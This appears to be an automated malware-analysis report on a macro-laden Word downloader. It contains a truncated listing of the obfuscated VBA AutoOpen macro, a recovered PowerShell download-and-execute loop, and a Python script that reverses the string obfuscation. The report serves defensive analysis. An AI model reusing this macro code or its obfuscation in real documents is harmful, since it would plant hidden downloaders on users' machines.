MALICIOUS (Risk Score: 142)

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)
The sample is a malicious Word document carrying a VBA macro. An AutoOpen subroutine is present, so the macro runs as soon as the document is opened with macros enabled. AutoOpen builds a command line by concatenating strings returned by helper functions (KeyString(6 + 6 + 0 + 7 + 48), ortUiZobb, UDHTNRz, rZvJQC, pTXjI, KinQEOZZUjti, HJuhLlcGQdlLV) and passes it to wjrqG, which calls Shell on it; the window-style argument CInt(msoBarTypeNormal) evaluates to 0 (vbHide), so the spawned process runs without a visible window. The many Dim/Mid/MidB/Left/Right lines are dead code: the offsets exceed the literal lengths and the arrays are never read. The fragments visible in ortUiZobb assemble a caret-escaped cmd.exe line that, once the carets are removed, begins `md /V:O/C"set jLT=` (KeyString presumably supplies the leading "c" of cmd, since the visible text starts at "md "); the value stored in that variable is written backwards. Read in reverse, the recoverable portion is PowerShell of the form `foreach($djr in $VlR){try{$oYI.DownloadFile($djr, $nDV);Invoke-Item $nDV;break;}catch{}}`, i.e. iterate over a list of URLs, download to a .exe path and execute the first one that succeeds. That confirms download-and-execute intent, but the URL list ($VlR) and the WebClient setup live in functions the preview truncates, so no network indicator is recoverable from this report, and the generic string-reversal and caret obfuscation does not support definitive family attribution.
Heuristics (5)

- ClamAV: Doc.Downloader.00536d-6695627-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.00536d-6695627-0
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the VBA project was in fact recovered (see OLE_VBA_MACROS, OLE_VBA_AUTOOPEN and the macros.bas artifact below), so treat this marker as a second sighting of the same AutoOpen entry point rather than as independent evidence.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace present in practically every modern Office file, not a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10214 bytes | b0724a0dc4cab5fa737227f680e1fb1fca4dfc4678961e8a0415c61424672f64 |

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "GRsEIKjQLIibp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim ourWAh(1)
ourWAh(0) = MidB("rPTzwFht", 2, 324)
Dim MmzQC(1)
MmzQC(0) = Mid("XREtw", 90, 350)
Dim TYMqRT(1)
TYMqRT(0) = Mid("sItCTh", 497, 794)
Dim INHuT(2)
INHuT(0) = MidB("jaKmO", 824, 674)
INHuT(1) = MidB("BTaAS", 249, 226)
Dim hKBYj(2)
hKBYj(0) = Left("zGZWM", 794)
hKBYj(1) = MidB("TSAbkj", 861, 394)
Dim XlQwlh(1)
XlQwlh(0) = Mid("CjviM", 583, 862)
Dim whiSsG(1)
whiSsG(0) = MidB("ilPtY", 619, 995)
wjrqG (KeyString(6 + 6 + 0 + 7 + 48) + ortUiZobb + UDHTNRz + rZvJQC + pTXjI + KinQEOZZUjti + HJuhLlcGQdlLV)
Dim scjipP(2)
scjipP(0) = Mid("huCNkOMt", 337, 293)
scjipP(1) = Mid("VuBaW", 922, 500)
Dim VjYvaT(1)
VjYvaT(0) = Left("fZuSIt", 470)
Dim wdblP(2)
wdblP(0) = MidB("SLBIENJ", 597, 869)
wdblP(1) = Mid("mwwzVnhU", 860, 570)
Dim IwGslQ(2)
IwGslQ(0) = Left("TYYWXup", 225)
IwGslQ(1) = MidB("kjOkJtPF", 838, 149)
End Sub
Function wjrqG(MNJRh As String)
Dim FnIOX(1)
FnIOX(0) = MidB("koJbTjs", 402, 858)
Dim bEpcmM(2)
bEpcmM(0) = Mid("qiPhA", 26, 571)
bEpcmM(1) = Right("tBTkOJWJ", 514)
Shell@ MNJRh, CInt(msoBarTypeNormal)
Dim zUwLAJ(2)
zUwLAJ(0) = MidB("lisXVT", 193, 349)
zUwLAJ(1) = MidB("ZWPiu", 514, 514)
Dim uBRYW(1)
uBRYW(0) = Right("OfVwp", 366)
Dim XoQDnH(2)
XoQDnH(0) = MidB("cqrBHiTF", 904, 281)
XoQDnH(1) = Right("LEQpRq", 198)
Dim HXfiX(2)
HXfiX(0) = MidB("tzUAIt", 607, 37)
HXfiX(1) = Left("MiWCrwsu", 972)
End Function
Attribute VB_Name = "UvFsXtOpslmDK"
Function ortUiZobb()
Dim odWOU(1)
odWOU(0) = MidB("dovBYn", 881, 559)
Dim rQmfhA(1)
rQmfhA(0) = Mid("nrDJaCH", 551, 327)
DFMwMznzTmP = "md" + " " + "/V^:" + "^O/" + "C" + ChrW(3 + 0 + 4 + 5 + 22) + "^s" + "e" + "t j^"
Dim JAPMk(2)
JAPMk(0) = MidB("rdGMTXv", 815, 829)
JAPMk(1) = MidB("ZwEVcwN", 42, 854)
BuTBoiDf = "L^" + "T= " + " ^" + " " + " " + " ^ ^" + " ^ " + " ^ ^" + " " + "^ " + " ^ " + "}^}" + "{^h"
Dim LciMmN(1)
LciMmN(0) = Mid("ivcYwj", 172, 378)
Dim aROrE(1)
aROrE(0) = Left("riBsbEWj", 20)
Dim EJjKE(2)
EJjKE(0) = Right("TQSKEzil", 262)
EJjKE(1) = Left("JQALh", 62)
Dim zbNGdF(1)
zbNGdF(0) = MidB("ZECMRjAz", 17, 773)
DPQRFAzuvwK = "cta" + "c" + "^}^;" + "^" + "kaer" + "^" + "b^;" + "V^"
Dim QwMXSA(2)
QwMXSA(0) = MidB("fRUriEiZ", 296, 670)
QwMXSA(1) = Left("soXcs", 703)
Dim jFoJzr(2)
jFoJzr(0) = Left("PYKZi", 427)
jFoJzr(1) = Mid("wKMQd", 276, 421)
Dim oGmqi(1)
oGmqi(0) = MidB("UsZYwXH", 631, 191)
Dim IYWRD(2)
IYWRD(0) = MidB("nEbZTT", 657, 836)
IYWRD(1) = Mid("VAZoK", 296, 803)
CriUE = "Dn$" + "^ ^" + "m" + "^e" + "^t" + "^I" + "-" + "ek^o" + "vn^I" + ";)V" + "D" + "n$^"
Dim pMPcGj(1)
pMPcGj(0) = Mid("rjfldZB", 25, 694)
AnhHVhwvXlf = " " + ",r" + "^j^" + "d$(" + "el^" + "i^" + "Fd^a" + "^oln" + "woD^" + ".I"
Dim CnQTF(1)
CnQTF(0) = MidB("dphiGSYi", 616, 272)
XfNlQDtdr = "^Y^o" + "^$^" + "{yr^" + "t" + "^{)R"
Dim Mutmz(1)
Mutmz(0) = MidB("ddUMK", 344, 142)
Dim CQtEz(2)
CQtEz(0) = Left("izhoINv", 824)
CQtEz(1) = Right("tQVzJzhl", 763)
Dim UppcwL(2)
UppcwL(0) = MidB("raYnaJ", 838, 815)
UppcwL(1) = MidB("wZtKjdu", 925, 238)
mrVLOCYJPck = "l" + "V" + "^$^" + " " + "n^i"
Dim WYnHl(2)
WYnHl(0) = Right("caiCIfl", 589)
WYnHl(1) = Mid("LwrzimZT", 896, 924)
wzYYNlz = " rj" + "^d$" + "(^h" + "caer" + "o^f" + ";^'^" + "exe." + "^'" + "+Q^" + "Qd^$" + "^+" + "^'^\" + "'^+"
ortUiZobb = DFMwMznzTmP + BuTBoiDf + DPQRFAzuvwK + CriUE + AnhHVhwvXlf + XfNlQDtdr + mrVLOCYJPck + wzYYNlz
Dim rHqNf(1)
rHqNf(0) = MidB("VnwRwbwF", 864, 219)
Dim WFwwS(1)
WFwwS(0) = MidB("YSZRQ", 397, 227)
Dim VfGpS(1)
VfGpS(0) = Left("LYuhWl", 363)
End Function
Function UDHTNRz()
Dim odoMaD(2)
odoMaD(0) = Left("bFhEnd", 121)
odoMaD(1) = R
... (truncated)
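The string assembly in ortUiZobb above can be undone mechanically. The following is an added worked example, not part of the analyzer output and not oletools code: it interprets only the VBA subset the visible lines use (string literals, `+` concatenation, ChrW() over an integer sum, and references to earlier assignments), removes cmd.exe caret escaping, and reads the `set jLT=` value backwards. The reversal step is an inference from the recovered fragments (they spell DownloadFile, Invoke-Item, break and catch only when read in reverse); the cmd code that performs the reversal at run time, the URL list `$VlR`, and the WebClient setup are in functions the preview truncates and are not reconstructed here. The VBA_EXCERPT is copied from the listing with the dead Dim/MidB lines removed; all helper names are the example's own.

```python
import re

# Lines copied from the ortUiZobb() listing above; the Dim/MidB filler is
# omitted because nothing ever reads those arrays.
VBA_EXCERPT = r'''
DFMwMznzTmP = "md" + " " + "/V^:" + "^O/" + "C" + ChrW(3 + 0 + 4 + 5 + 22) + "^s" + "e" + "t j^"
BuTBoiDf = "L^" + "T= " + " ^" + " " + " " + " ^ ^" + " ^ " + " ^ ^" + " " + "^ " + " ^ " + "}^}" + "{^h"
DPQRFAzuvwK = "cta" + "c" + "^}^;" + "^" + "kaer" + "^" + "b^;" + "V^"
CriUE = "Dn$" + "^ ^" + "m" + "^e" + "^t" + "^I" + "-" + "ek^o" + "vn^I" + ";)V" + "D" + "n$^"
AnhHVhwvXlf = " " + ",r" + "^j^" + "d$(" + "el^" + "i^" + "Fd^a" + "^oln" + "woD^" + ".I"
XfNlQDtdr = "^Y^o" + "^$^" + "{yr^" + "t" + "^{)R"
mrVLOCYJPck = "l" + "V" + "^$^" + " " + "n^i"
wzYYNlz = " rj" + "^d$" + "(^h" + "caer" + "o^f" + ";^'^" + "exe." + "^'" + "+Q^" + "Qd^$" + "^+" + "^'^\" + "'^+"
ortUiZobb = DFMwMznzTmP + BuTBoiDf + DPQRFAzuvwK + CriUE + AnhHVhwvXlf + XfNlQDtdr + mrVLOCYJPck + wzYYNlz
'''

# Tokens of the VBA subset we need: "literal", ChrW(<ints>), Name, '+', blanks.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|ChrW\(([^)]*)\)|([A-Za-z_]\w*)|(\+)|(\s+)')
ASSIGN = re.compile(r'\s*([A-Za-z_]\w*)\s*=\s*(.*)$')
SET_VAR = re.compile(r'set\s+(\w+)=(.*)', re.DOTALL)


def eval_concat(expr, env):
    """Evaluate a VBA string expression built from literals, ChrW() of an
    integer sum, previously assigned names and '+', left to right."""
    out, pos = [], 0
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported VBA near {expr[pos:pos + 20]!r}")
        lit, chrw, name, _plus, _ws = m.groups()
        if lit is not None:
            out.append(lit.replace('""', '"'))   # VBA doubles quotes inside literals
        elif chrw is not None:
            out.append(chr(sum(int(t) for t in chrw.split('+'))))
        elif name is not None:
            out.append(env[name])                # reference to an earlier assignment
        pos = m.end()
    return ''.join(out)


def run_assignments(vba_source):
    """Execute the 'Name = expr' lines in order; returns name -> string value."""
    env = {}
    for line in vba_source.splitlines():
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = eval_concat(m.group(2), env)
    return env


def cmd_unescape(s):
    """Undo cmd.exe caret escaping: '^x' -> 'x' (so '^^' -> '^'); a lone
    trailing caret is dropped."""
    out, i = [], 0
    while i < len(s):
        if s[i] == '^':
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def recover_command(vba_source=VBA_EXCERPT, result='ortUiZobb'):
    """The cmd.exe text this function contributes, with carets removed."""
    return cmd_unescape(run_assignments(vba_source)[result])


def reversed_set_value(vba_source=VBA_EXCERPT):
    """(variable, value) of the first 'set NAME=' in the recovered command,
    with the value read backwards: the macro stores its PowerShell reversed
    (the cmd-side code that reverses it again is outside the visible listing)."""
    m = SET_VAR.search(recover_command(vba_source))
    return m.group(1), m.group(2)[::-1].strip()


if __name__ == '__main__':
    print(recover_command())
    var, payload = reversed_set_value()
    print(f'{var} (reversed): {payload}')
```

Running it prints the caret-free cmd line and then `jLT (reversed): +'\'+$dQQ+'.exe';foreach($djr in $VlR){try{$oYI.DownloadFile($djr, $nDV);Invoke-Item $nDV;break;}catch{}}`, which is the tail of the PowerShell downloader loop. To extend the recovery to the rest of the command, paste the assignment lines of the truncated functions (UDHTNRz onward) into VBA_EXCERPT in the order AutoOpen concatenates them; only the `Name = ... + ...` lines matter.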